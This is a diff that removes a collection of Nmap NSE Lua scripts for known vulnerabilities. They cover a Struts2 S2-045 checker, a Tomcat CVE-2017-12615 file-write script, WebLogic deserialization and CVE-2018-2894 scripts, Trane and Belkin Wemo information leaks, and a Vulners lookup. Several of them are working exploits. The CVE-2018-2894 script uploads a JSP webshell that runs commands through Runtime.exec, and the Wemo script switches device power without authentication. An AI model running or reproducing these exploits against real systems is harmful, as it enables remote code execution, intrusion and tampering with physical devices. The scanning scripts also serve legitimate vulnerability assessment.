elseif #response.body == 22 then
output["status"] = "S2-045-AChecks vuln22"
return output
--response: 0000 53 74 72 75 74 73 32 53 32 30 34 35 43 68 65 63 Struts2S2045Chec
-- 0010 6b 73 21 21 21 0d 0a ks!!!..
elseif #response.body == 23 then
output["status"] = "S2-045-AChecks vuln23"
return output
elseif #response.body < 50 then
output["status"] = "S2-045-AChecks"
output["resplength"] = #response.body
return output
else
output["status"] = "S2-045-AChecks lengtherror"
output["resplength"] = #response.body
return output
end
end
end
end
if response.status == 302 or response.status == 301 then
if response.location then
local parseurl = http.parse_url(response.location[#response.location])
--fix location http://127.0.0.1/login.action to http://host:port/uri
local response = http.get(parseurl.host,port,parseurl.path,options)
if response.status == 200 then
if string.find(response.body, "Struts2S2045Checks") ~= nil then
if string.find(response.body, "phpinfo") == nil then
if #response.body == 21 then
output["status"] = "S2-045-BChecks vuln21"
return output
elseif #response.body == 22 then
output["status"] = "S2-045-BChecks vuln22"
return output
elseif #response.body == 23 then
output["status"] = "S2-045-BChecks vuln23"
return output
elseif #response.body < 50 then
output["status"] = "S2-045-BChecks"
output["resplength"] = #response.body
return output
else
output["status"] = "S2-045-BChecks lengtherror"
output["resplength"] = #response.body
return output
end
end
end
end
end
end
-- Debug
-- if response.status == 404 and response.body then
-- output["status"] = "S2-045-CChecks"
-- output["res"] = response.body
-- return output
-- end
end


@ -1,43 +0,0 @@
local stdnse = require "stdnse"
local http = require "http"
description = [[
for the vulnerability of tomcat-cve-2017-12615 This script will write a webshell into web server.
$ git clone https://github.com/Rvn0xsy/nse_vuln.git
$ cd /nse_vuln/
$ sudo cp * /usr/share/nmap/scripts/
$ sudo nmap -p 80,8080,8090,8899 --script XX.NSE victim_host
]]
prerule=function()
end
hostrule=function(host)
return false
end
portrule=function(host,port)
local ports = {80,8080,8090,8899}
for i in pairs(ports)do
if(port.number == ports[i])then
return true
end
end
end
action = function(host,port)
local shell_name = string.format("%sCVE-2017-12615-CHECK-%d.jsp","/",math.random(9999))
local status = stdnse.output_table()
local put_rsp = http.put(host,port,shell_name.."/",nil,"CVE-2017-12615")
if(put_rsp.status == 201)then
status.shell_name = shell_name
local response = http.get(host,port,shell_name)
if(response and http.response_contains(response,"CVE%-2017%-12615") )then
return status
end
return false
end
return false
end
postrule=function()
end


@ -1,182 +0,0 @@
local nmap = require "nmap"
local http = require "http"
local stdnse = require "stdnse"
local string = require "string"
local shortport = require "shortport"
description = [[
Trane Tracer SC is an intelligent field panel for communicating with HVAC equipment controllers. According to Trane U.S. Inc., Tracer SC is deployed across several sectors including Commercial Facilities and others.
Contents of specific directories on the Tracer SC are exposed with the web server application to unauthenticated users.
Valid on Trane Tracer SC version 4.40.1211 and below. Tested on 7/3/17.
References:
* http://websec.mx
]]
---
-- @usage nmap -p80 --script trane-info.nse <target>
--
-- @output
-- | trane-info:
-- | serverName: TracerSC
-- | serverTime: 2017-07-03T21:01:02-04:00
-- | serverBootTime: 2017-06-25T03:14:38-04:00
-- | vendorName: Trane
-- | productName: Tracer SC
-- | productVersion: v4.40.1211 (release)
-- | kernelVersion: 2.6.30_HwVer12AB-hydra
-- | hardwareType: HwVer12AB
-- | hardwareSerialNumber: E15A#####
-- | 1:equipmentUri: /equipment/generic/generic/##
-- | 1:displayName: BOILER ROOMS
-- | 1:deviceName: BOILER ROOMS
-- | 1:equipmentFamily: Generic
-- | 1:roleDocument: BOILER_ROOMS
-- | 1:isOffline: false
-- | 2:equipmentUri: /equipment/generic/generic/##
-- | 2:displayName: BOILER ROOMS
-- | 2:deviceName: BOILER ROOMS
-- | 2:equipmentFamily: Generic
-- | 2:roleDocument: BOILER_ROOMS
-- | 2:isOffline: false
-- | 3:equipmentUri: /equipment/generic/generic/##
-- | 3:displayName: EXHAUSTS 3 RM-6
-- | 3:deviceName: EXHAUSTS 3 RM-6
-- | 3:equipmentFamily: Generic
-- | 3:roleDocument: EXHAUSTS_3_RM-6
-- | 3:isOffline: false
--
-- @xmloutput
-- <elem key="serverName">TracerSC </elem>
-- <elem key="serverTime">2017-07-03T21:01:02-04:00 </elem>
-- <elem key="serverBootTime">2017-06-25T03:14:38-04:00 </elem>
-- <elem key="vendorName">Trane </elem>
-- <elem key="productName">Tracer SC </elem>
-- <elem key="productVersion">v4.40.1211 (release) </elem>
-- -- <elem key="kernelVersion">2.6.30_HwVer12AB-hydra </elem>
-- <elem key="hardwareType">HwVer12AB </elem>
-- <elem key="hardwareSerialNumber">E15A##### </elem>
-- <elem key="1:equipmentUri">/equipment/generic/generic/## </elem>
-- <elem key="1:displayName">BOILER ROOMS </elem>
-- <elem key="1:deviceName">BOILER ROOMS </elem>
-- <elem key="1:equipmentFamily">Generic </elem>
-- <elem key="1:roleDocument">BOILER_ROOMS </elem>
-- <elem key="1:isOffline">false </elem>
-- <elem key="2:equipmentUri">/equipment/generic/generic/## </elem>
-- <elem key="2:displayName">BOILER ROOMS </elem>
-- <elem key="2:deviceName">BOILER ROOMS </elem>
-- <elem key="2:equipmentFamily">Generic </elem>
-- <elem key="2:roleDocument">BOILER_ROOMS </elem>
-- <elem key="2:isOffline">false </elem>
-- <elem key="3:equipmentUri">/equipment/generic/generic/## </elem>
-- <elem key="3:displayName">EXHAUSTS 3 RM-6 </elem>
-- <elem key="3:deviceName">EXHAUSTS 3 RM-6 </elem>
-- <elem key="3:equipmentFamily">Generic </elem>
-- <elem key="3:roleDocument">EXHAUSTS_3_RM-6 </elem>
-- <elem key="3:isOffline">false </elem>
---
author = "Pedro Joaquin <pjoaquin()websec.mx>"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"discover", "version", "safe"}
portrule = shortport.portnumber({80})
local function GetInformation(host, port)
local output = stdnse.output_table()
--Get information from /evox/about
local uri = '/evox/about'
local response = http.get(host, port, uri)
if response['status-line'] and response['status-line']:match("200") then
--Verify parsing of XML from /evox/about
local deviceType = response['body']:match('serverName" val=([^<]*)/>')
if not deviceType then
stdnse.debug1("Problem with XML parsing of /evox/about")
return nil,"Problem with XML parsing of /evox/about"
end
--Parse information from /evox/about
local keylist = {"serverName","serverTime","serverBootTime","vendorName","productName","productVersion","kernelVersion","hardwareType","hardwareSerialNumber"}
for _,key in ipairs(keylist) do
stdnse.debug1("Looking for : "..key)
output[key] = response['body']:match(key..'" val=([^<]*)/>')
stdnse.debug1("Found : "..output[key])
output[key] = output[key]:gsub('"', "")
end
--Get information from /evox/equipment/installedSummary
local uri = '/evox/equipment/installedSummary'
local response = http.get(host, port, uri)
if response['status-line'] and response['status-line']:match("200") then
--Verify parsing of XML from /evox/equipment/installedSummary
local error = response['body']:match('Error code: 00017')
if error then
stdnse.debug1("/evox/equipment/installedSummary is not available")
end
local equipmentUri = response['body']:match('equipmentUri" val=([^<]*)/>')
if not equipmentUri then
stdnse.debug1("Problem with XML parsing")
end
if not error then
--Parse information from /evox/equipment/installedSummary
local keylist = {"equipmentUri","displayName","deviceName","equipmentFamily","roleDocument","isOffline"}
local _,lastequipmentUri = response['body']:find(".*equipmentUri")
stdnse.debug1("lastequipmentUri : "..lastequipmentUri)
local count = 1
local nextequipmentUri = 1
while nextequipmentUri < lastequipmentUri do
for _,key in ipairs(keylist) do
stdnse.debug1("Looking for : "..key)
output[count..":"..key] = response['body']:match(key..'" val=([^<]*)/>',nextequipmentUri)
if output[count..":"..key] == nil then
output[count..":"..key] = "Not available"
else
output[count..":"..key] = output[count..":"..key]:gsub('"', "")
stdnse.debug1("Found : "..output[count..":"..key])
end
end
_,nextequipmentUri = response['body']:find("equipmentUri",nextequipmentUri)
count = count + 1
stdnse.debug1("Count : "..count)
end
end
end
stdnse.debug1("status-line: "..response['status-line'])
local error = response['status-line']:match('Error')
if error then
stdnse.debug1("Request returned a network error.")
return nil, "Request returned a network error."
end
-- Set the port version
port.version.name = "http"
port.version.name_confidence = 10
port.version.product = output["productName"]
port.version.version = output["productVersion"]
port.version.devicetype = output["hardwareType"]
table.insert(port.version.cpe, "cpe:/h:".. output["vendorName"] .. ":" .. output["productName"])
nmap.set_port_version(host, port, "hardmatched")
return output
end
end
action = function(host,port)
-- Identify servers that answer 200 to invalid HTTP requests and exit as these would invalidate the tests
local status_404, result_404, _ = http.identify_404(host,port)
if ( status_404 and result_404 == 200 ) then
stdnse.debug1("Exiting due to ambiguous response from web server on %s:%s. All URIs return status 200.", host.ip, port.number)
return nil
end
return GetInformation(host, port)
end


@ -1,235 +0,0 @@
description = [[
NSE script using some well-known service to provide info on vulnerabilities
For each available cpe it prints the known vulns (links to the correspondent info).
Its work is pretty simple:
- work only when some software version is identified for an open port
- take all the known cpe for that software (from the standard nmap output)
- ask whether some known vulns exist for that cpe
- print that info out
https://github.com/vulnersCom/nmap-vulners/releases/latest
Dependencies:
nmap libraries:
http
json
string
The only thing you should always keep in mind is that the script depends on having software versions at hand, so it only works with -sV flag.
Installation
locate, where your nmap scripts are located in your system
for *nix system it might be ~/.nmap/scripts/ or $NMAPDIR
for Mac it might be /usr/local/Cellar/nmap/<version>/share/nmap/scripts/
for Windows you have to find it yourself
copy the provided script (vulners.nse) into that directory
Usage
Use it as straightforward as you can:
nmap -sV --script vulners <target>
]]
---
-- @usage
-- nmap -sV --script vulners <target>
--
-- @output
--
-- 53/tcp open domain ISC BIND DNS
-- | vulners:
-- | ISC BIND DNS:
-- | CVE-2012-1667 8.5 https://vulners.com/cve/CVE-2012-1667
-- | CVE-2002-0651 7.5 https://vulners.com/cve/CVE-2002-0651
-- | CVE-2002-0029 7.5 https://vulners.com/cve/CVE-2002-0029
-- | CVE-2015-5986 7.1 https://vulners.com/cve/CVE-2015-5986
-- | CVE-2010-3615 5.0 https://vulners.com/cve/CVE-2010-3615
-- | CVE-2006-0987 5.0 https://vulners.com/cve/CVE-2006-0987
-- | CVE-2014-3214 5.0 https://vulners.com/cve/CVE-2014-3214
--
author = 'gmedian AT vulners DOT com'
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "safe"}
local http = require "http"
local json = require "json"
local string = require "string"
local table = require "table"
local api_version="1.1"
portrule = function(host, port)
local vers=port.version
return vers ~= nil and vers.version ~= nil
end
---
-- Return a string with all the found cve's and correspondent links
--
-- @param vulns a table with the parsed json response from the vulners server
--
function make_links(vulns)
local output_str=""
local is_exploit=false
local cvss_score=""
-- NOTE[gmedian]: data.search is a "list" already, so just use table.sort with a custom compare function
-- However, for the future it might be wiser to create a copy rather than do it in-place
local vulns_result = {}
for _, v in ipairs(vulns.data.search) do
table.insert(vulns_result, v)
end
-- Sort the acquired vulns by the CVSS score
table.sort(vulns_result, function(a, b)
return a._source.cvss.score > b._source.cvss.score
end
)
for _, vuln in ipairs(vulns_result) do
-- Mark the exploits out
is_exploit = vuln._source.bulletinFamily:lower() == "exploit"
-- Sometimes it might happen, so check the score availability
cvss_score = vuln._source.cvss and ("\t\t" .. vuln._source.cvss.score) or ""
output_str = string.format("%s\n\t%s", output_str, vuln._source.id .. cvss_score .. '\t\thttps://vulners.com/' .. vuln._source.type .. '/' .. vuln._source.id .. (is_exploit and '\t\t*EXPLOIT*' or ''))
end
return output_str
end
---
-- Issues the requests, receives json and parses it, calls <code>make_links</code> when successfull
--
-- @param what string, future value for the software query argument
-- @param vers string, the version query argument
-- @param type string, the type query argument
--
function get_results(what, vers, type)
local v_host="vulners.com"
local v_port=443
local response, path
local status, error
local vulns
local option={header={}}
option['header']['User-Agent'] = string.format('Vulners NMAP Plugin %s', api_version)
path = '/api/v3/burp/software/' .. '?software=' .. what .. '&version=' .. vers .. '&type=' .. type
response = http.get(v_host, v_port, path, option)
status = response.status
if status == nil then
-- Something went really wrong out there
-- According to the NSE way we will die silently rather than spam user with error messages
return ""
elseif status == 418 then
-- Too many requests
return "You are doing it too fast. Lower the rate or contact isox AT vulners DOT com."
elseif status ~= 200 then
-- Again just die silently
return ""
end
status, vulns = json.parse(response.body)
if status == true then
if vulns.result == "OK" then
return make_links(vulns)
end
end
return ""
end
---
-- Calls <code>get_results</code> for type="software"
--
-- It is called from <code>action</code> when nothing is found for the available cpe's
--
-- @param software string, the software name
-- @param version string, the software version
--
function get_vulns_by_software(software, version)
return get_results(software, version, "software")
end
---
-- Calls <code>get_results</code> for type="cpe"
--
-- Takes the version number from the given <code>cpe</code> and tries to get the result.
-- If none found, changes the given <code>cpe</code> a bit in order to possibly separate version number from the patch version
-- And makes another attempt.
-- Having failed returns an empty string.
--
-- @param cpe string, the given cpe
--
function get_vulns_by_cpe(cpe)
local vers
local vers_regexp=":([%d%.%-%_]+)([^:]*)$"
local output_str=""
-- TODO[gmedian]: add check for cpe:/a as we might be interested in software rather than in OS (cpe:/o) and hardware (cpe:/h)
-- TODO[gmedian]: work not with the LAST part but simply with the THIRD one (according to cpe doc it must be version)
-- NOTE[gmedian]: take only the numeric part of the version
_, _, vers = cpe:find(vers_regexp)
if not vers then
return ""
end
output_str = get_results(cpe, vers, "cpe")
if output_str == "" then
local new_cpe
new_cpe = cpe:gsub(vers_regexp, ":%1:%2")
output_str = get_results(new_cpe, vers, "cpe")
end
return output_str
end
action = function(host, port)
local tab={}
local changed=false
local response
local output_str=""
for i, cpe in ipairs(port.version.cpe) do
output_str = get_vulns_by_cpe(cpe, port.version)
if output_str ~= "" then
tab[cpe] = output_str
changed = true
end
end
-- NOTE[gmedian]: issue request for type=software, but only when nothing is found so far
if not changed then
local vendor_version = port.version.product .. " " .. port.version.version
output_str = get_vulns_by_software(port.version.product, port.version.version)
if output_str ~= "" then
tab[vendor_version] = output_str
changed = true
end
end
if (not changed) then
return
end
return tab
end


@ -1,88 +0,0 @@
local http = require "http"
local nmap = require "nmap"
local stdnse = require "stdnse"
local vulns = require "vulns"
description = [[
Weblogic CNVD-C-2019-48814
$ git clone https://github.com/Rvn0xsy/nse_vuln.git
$ cd /nse_vuln/
$ sudo cp * /usr/share/nmap/scripts/
$ sudo nmap -sV -p 7001 --script weblogic-CNVD-C-2019-48814.nse victim_host
]]
---
-- @usage
-- nmap -sV --script weblogic-CNVD-C-2019-48814 <target> -p 7001
-- nmap -sV --script weblogic-CNVD-C-2019-48814
--
-- @output
-- PORT STATE SERVICE
-- 7001/tcp open afs3-callback
-- | weblogic-CNVD-C-2019-48814:
-- | VULNERABLE:
-- | Oracle WebLogic wls9-async Deserialization Remote Command Execution Vulnerability
-- | State: VULNERABLE
-- | IDs: 1:CNVD-C-2019-48814 CVE:CVE-2019-????
-- | Risk factor: High CVSSv3: ???
-- |
-- | Disclosure date: 2019-04-17
-- | References:
-- | http://www.cnvd.org.cn/webinfo/show/4989
-- | http://www.cnvd.org.cn/webinfo/show/4999
-- |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-????
author = "Rvn0xsy <rvn0xsy@gmail.com>"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln"}
blog = "https://payloads.online"
portrule = function(host,port)
-- if(port.number == 7001)then
-- return true
-- end
-- return false
return true
end
action = function(host,port)
local vuln_table = {
title ="Oracle WebLogic wls9-async Deserialization Remote Command Execution Vulnerability",
IDS = {CVE = 'CVE-2019-????','CNVD-C-2019-48814'},
risk_factor = "High",
scores = {
CVSSv3 = "???",
},
description = [[]],
references = {
'http://www.cnvd.org.cn/webinfo/show/4989',
'http://www.cnvd.org.cn/webinfo/show/4999',
},
dates = {
disclosure = {year = '2019', month = '04', day = '17'},
},
check_results = {},
extra_info = {}
}
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
vuln_table.state = vulns.STATE.NOT_VULN
path = "/_async/AsyncResponseService"
local result = http.get(host,port,path)
local status = stdnse.output_table()
if(result.status == 200)then
if(string.find(result.body,"async") == nil)then
local status = stdnse.output_table()
status.Vuln = "False"
return status
end
options = {}
options['header'] = {}
options['header']['Content-Type'] = 'text/xml'
local payload = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">\n<soapenv:Header>\n<wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n<void class=\"POC\">\n<array class=\"xx\" length=\"0\">\n</array>\n<void method=\"start\"/>\n</void>\n</work:WorkContext>\n</soapenv:Header>\n<soapenv:Body>\n<asy:onAsyncDelivery/>\n</soapenv:Body>\n</soapenv:Envelope>\n"
local response = http.post(host,port,path,options,nil,payload)
if(response.status == 202)then
vuln_table.state = vulns.STATE.VULN
return vuln_report:make_output(vuln_table)
end
end
return vuln_report:make_output(vuln_table)
end


@ -1,87 +0,0 @@
local http = require "http"
local nmap = require "nmap"
local stdnse = require "stdnse"
description = [[
Weblogic CVE-2018-2894
$ git clone https://github.com/Rvn0xsy/nse_vuln.git
$ cd /nse_vuln/
$ sudo cp * /usr/share/nmap/scripts/
$ sudo nmap -n -p 443 --script weblogic-cve-2018-2894.nse victim_host
]]
---
-- @usage
-- nmap -sV --script weblogic-cve-2018-2894 <target> -p 7001
-- nmap -sV --script weblogic-cve-2018-2894
-- --script-args 'weblogic-cve-2018-2894.uri=/,test.jsp,weblogic-cve-2018-2894.filename=test.jsp,weblogic-cve-2018-2894.content=test' <target> -p 7001
--
-- @output
-- PORT STATE SERVICE
-- 7001/tcp open afs3-callback
-- | weblogic-upload:
-- |_ url: /ws_utc/config/keystore/1532325925_Nmap.jsp
-- MAC Address: 02:42:AC:13:00:02 (Unknown)
--
--
-- @args weblogic-cve-2018-2894.uri points to the file '/weblogic/'. Default /
-- @args weblogic-cve-2018-2894.filename the name of the file to be uploaded
-- @args weblogic-cve-2018-2894.content file's contents
-- Other useful arguments when using this script are:
-- * http.useragent = String - User Agent used in HTTP requests
author = "Rvn0xsy <payloads@aliyun.com>"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"exploit"}
portrule = function(host,port)
if(port.number == 7001)then
return true
end
return false
end
add_formData = function(form,boundary)
local contents = "\r\n"
for key,value in pairs(form) do
contents = string.format("%sContent-Disposition: form-data; name=\"%s\"\r\n\r\n%s\r\n--%s\r\n",contents,key,value,boundary)
end
-- return contents.."--\r\n"
return contents
end
add_fileData = function(file,boundary)
return string.format("Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"\r\nContent-Type: text/plain\r\n\r\n--%s--\r\n",file["name"],file["filename"],boundary)
end
action = function(host,port)
form = {}
file = {}
shell = {}
form["ks_name"] = "Exploit CVE-2018-2894"
form["ks_edit_mode"] = "false"
form["ks_password_front"] = "123456"
form["ks_password"] = "123456"
form["ks_password_changed"] = "true"
file["name"]="ks_filename"
file["filename"] = stdnse.get_script_args('weblogic-cve-2018-2894.filename') or "test.jsp"
file["content"] = stdnse.get_script_args('weblogic-cve-2018-2894.content') or "<%@ page import=\"java.io.*\" %><%try {String cmd = request.getParameter(\"cmd\");Process child = Runtime.getRuntime().exec(cmd);InputStream in = child.getInputStream();int c;while ((c = in.read()) != -1) {out.print((char)c);}in.close();try {child.waitFor();}catch (InterruptedException e) {e.printStackTrace();}}catch (IOException e) {System.err.println(e);}%>"
time = os.time()
uri = stdnse.get_script_args('weblogic-cve-2018-2894.filename') or "/"
boundary = "-ABC"
ks_name = "Exploit CVE-2018-2894"
filename = time.."_"..file["filename"]
post_url = uri .. "ws_utc/resources/setting/keystore?timestamp="..os.time()
options = {}
options.header = {}
options.content = "\r\n--"..boundary
options.header['Content-Type'] = "multipart/form-data; boundary="..boundary
options.content = options.content .. add_formData(form,boundary)
options.content = options.content .. add_fileData(file,boundary)
resp = http.post(host,port,post_url,options,nil,nil)
if(resp.status == 200)then
shell["url"] = uri .. "ws_utc/config/keystore/"..filename
return shell
end
return false
end


@ -1,144 +0,0 @@
local nmap = require "nmap"
local http = require "http"
local stdnse = require "stdnse"
local string = require "string"
local shortport = require "shortport"
description = [[
The Belkin Wemo Switch is a network enabled power outlet. This scripts obtains
information from Belkin Wemo Switch including nearby wireless networks and the
current switch state (ON/OFF).
There is a separate NSE script that may be used for changing the switch state.
No authentication is required.
Valid on Belkin Wemo Switch version WeMo_WW_2.00.10966.PVT-OWRT-SNS on 6/24/17
References:
* http://websec.ca/blog/view/Belkin-Wemo-Switch-NMap-Scripts
* https://www.tripwire.com/state-of-security/featured/my-sector-story-root-shell-on-the-belkin-wemo-switch/
* https://www.exploitee.rs/index.php/Belkin_Wemo
]]
---
-- @usage nmap -p49152,49153,49154 --script wemo-info.nse <target>
--
-- @output
-- | wemo-info:
-- | friendlyName: : Wemo Switch
-- | deviceType: urn:Belkin:device:controllee:1
-- | manufacturer: Belkin International Inc.
-- | manufacturerURL: http://www.belkin.com
-- | modelDescription: Belkin Plugin Socket 1.0
-- | modelName: Socket
-- | modelNumber: 1.0
-- | modelURL: http://www.belkin.com/plugin/
-- | serialNumber: 220333K0203A4E
-- | UDN: uuid:Socket-1_0-220333K0203A4E
-- | UPC: 123456789
-- | macAddress: EC1A59EE48E3
-- | firmwareVersion: WeMo_WW_2.00.10966.PVT-OWRT-SNS
-- | iconVersion: 0|49154
-- | binaryState: 1
-- | Switch is currently turned: ON
-- | Nearby wireless networks: Page:1/1/4$
-- | Visita Cozumel FTW|5|0|OPEN/NONE,
-- | PVGP-2|6|0|WPA1PSKWPA2PSK/TKIPAES,
-- | INFINITUM|8|65|WPA2PSK/AES,
-- |_INFINITUM|11|0|WPA1PSKWPA2PSK/TKIPAES,
--
-- @xmloutput
-- <elem key="deviceType">urn:Belkin:device:controllee:1</elem>
-- <elem key="manufacturer">Belkin International Inc.</elem>
-- <elem key="manufacturerURL">http://www.belkin.com</elem>
-- <elem key="modelDescription">Belkin Plugin Socket 1.0</elem>
-- <elem key="modelName">Socket</elem>
-- <elem key="modelNumber">1.0</elem>
-- <elem key="modelURL">http://www.belkin.com/plugin/</elem>
-- <elem key="serialNumber">220333K0203A4E</elem>
-- <elem key="UDN">uuid:Socket-1_0-220333K0203A4E</elem>
-- <elem key="UPC">123456789</elem>
-- <elem key="macAddress">EC1A59ED59C4</elem>
-- <elem key="firmwareVersion">WeMo_WW_2.00.10966.PVT-OWRT-SNS</elem>
-- <elem key="iconVersion">0|49153</elem>
-- <elem key="binaryState">1</elem>
-- <elem key="Switch is currently turned">ON</elem>
-- <elem key="Nearby wireless networks">Page:1/1/4$&#xa;Visita Cozumel FTW|5|0|OPEN/NONE,&#xa;PVGP-2|6|0|WPA1PSKWPA2PSK/TKIPAES,&#xa;INFINITUM|8|65|WPA2PSK/AES,&#xa;INFINITUM|11|0|WPA1PSKWPA2PSK/TKIPAES,&#xa;</elem>
---
author = "Pedro Joaquin <pjoaquin()websec.mx>"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"discover", "version", "safe"}
portrule = shortport.portnumber({49152,49153,49154})
local function GetInformation(host, port)
local uri = '/setup.xml'
local response = http.get(host, port, uri)
if response['status-line'] and response['status-line']:match("200 OK") then
--Verify parsing of XML from /setup.xml
local deviceType = response['body']:match("<deviceType>([^<]*)</deviceType>")
if not deviceType then
stdnse.debug1("Problem with XML parsing")
return nil,"Problem with XML parsing"
end
--Parse information from /setup.xml
local output = stdnse.output_table()
local keylist = {"friendlyName","deviceType","manufacturer","manufacturerURL","modelDescription", "modelName","modelName","modelNumber","modelURL","serialNumber","UDN","UPC","macAddress","firmwareVersion","iconVersion","binaryState"}
for _,key in ipairs(keylist) do
stdnse.debug1("Looking for : "..key)
output[key] = response['body']:match("<"..key..">([^<]*)</"..key..">")
end
--Identify current Switch state
local bstate="Switch is currently turned"
if output["binaryState"] == "1" then
output[bstate] = "ON"
else
output[bstate] = "OFF"
end
--Post request to obtain nearby wireless network information
local req = '<?xml ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:GetApList xmlns:u="urn:Belkin:service:WiFiSetup1:1"></u:GetApList></s:Body></s:Envelope>'
local path = "/upnp/control/WiFiSetup1"
local options = {header={["SOAPACTION"]='"urn:Belkin:service:WiFiSetup1:1#GetApList"', ["Content-Type"]="text/xml"}}
local result = http.post( host, port, path, options, nil, req)
stdnse.debug1("Status-a : %s", result['status-line'] or "No Response")
if result['status-line'] and result['status-line']:match("200 OK") then
output["Nearby wireless networks"] = result['body']:match("<ApList>([^<]*)</ApList>")
else
stdnse.debug1("Status-b : %s", result['status-line'] or "No Response")
return false, "Couldn't download file: " .. path
end
-- set the port version
port.version.name = "http"
port.version.name_confidence = 10
port.version.product = output["modelDescription"] or nil
port.version.version = output["firmwareVersion"] or nil
port.version.devicetype = output["deviceType"] or nil
table.insert(port.version.cpe, "cpe:/h:".. output["manufacturer"] .. ":" .. output["modelDescription"])
nmap.set_port_version(host, port, "hardmatched")
return output
else
stdnse.debug1("Could not open '%s'", uri)
return false, "Could not open "..uri
end
end
action = function(host,port)
-- Identify servers that answer 200 to invalid HTTP requests and exit as these would invalidate the tests
local status_404, result_404, _ = http.identify_404(host,port)
if ( status_404 and result_404 == 200 ) then
stdnse.debug1("Exiting due to ambiguous response from web server on %s:%s. All URIs return status 200.", host.ip, port.number)
return nil
end
return GetInformation(host, port)
end


@ -1,76 +0,0 @@
local nmap = require "nmap"
local http = require "http"
local stdnse = require "stdnse"
local string = require "string"
local shortport = require "shortport"
description = [[
The Belkin Wemo Switch is a network enabled power outlet. This scripts changes
the switch state (ON/OFF) acording to the argument BinaryState.
There is a separate NSE script that may be used for obtaining information such
as the switch current state, nearby wireless networks and versions.
No authentication is required.
Valid on Belkin Wemo Switch version WeMo_WW_2.00.10966.PVT-OWRT-SNS on 6/22/17
References:
* http://websec.ca/blog/view/Belkin-Wemo-Switch-NMap-Scripts
* https://www.tripwire.com/state-of-security/featured/my-sector-story-root-shell-on-the-belkin-wemo-switch/
* https://www.exploitee.rs/index.php/Belkin_Wemo
]]
---
-- @usage nmap -p49152,49153,49154 --script wemo-switch --script-args BinaryState=1 <target>
--
-- @output
--| wemo-switch:
--| BinaryState: 1
--|_ Switch is currently turned: ON
--
-- @xmloutput
-- <elem key="BinaryState">1</elem>
-- <elem key="Switch is currently turned">ON</elem>
--
-- @args wemo-switch.BinaryState Turn the device ON (1) or OFF (0).
---
author = "Pedro Joaquin <pjoaquin()websec.mx>"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"exploit", "dos"}
portrule = shortport.portnumber({49152,49153,49154})
local function WemoSwitch(host, port, BinaryState)
local output = stdnse.output_table()
local req = '<?xml ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:SetBinaryState xmlns:u="urn:Belkin:service:basicevent1:1"><BinaryState>'..BinaryState..'</BinaryState></u:SetBinaryState></s:Body></s:Envelope>'
local path = "/upnp/control/basicevent1"
local options = {header={["SOAPACTION"]='"urn:Belkin:service:basicevent:1#SetBinaryState"', ["Content-Type"]="text/xml"}}
local result = http.post( host, port, path, options, nil, req)
stdnse.debug1("Status : %s", result['status-line'] or "No Response")
if(result['status'] ~= 200 or result['content-length'] == 0) then
stdnse.debug1("Status : %s", result['status-line'] or "No Response")
return nil, "Couldn't open: " .. path
else
output["BinaryState"] = result['body']:match("<BinaryState>([^<]*)</BinaryState>")
if output["BinaryState"] == "Error" then
output["BinaryState"] = BinaryState
end
local bstate="Switch is currently turned"
if output["BinaryState"] == "1" then
output[bstate] = "ON"
else
output[bstate] = "OFF"
end
return output
end
end
action = function(host,port)
local BinaryState = stdnse.get_script_args('wemo-switch.BinaryState')
if BinaryState == nil then
return nil, "You have to specify --script-args BinaryState=1"
else
return WemoSwitch(host, port, BinaryState)
end
end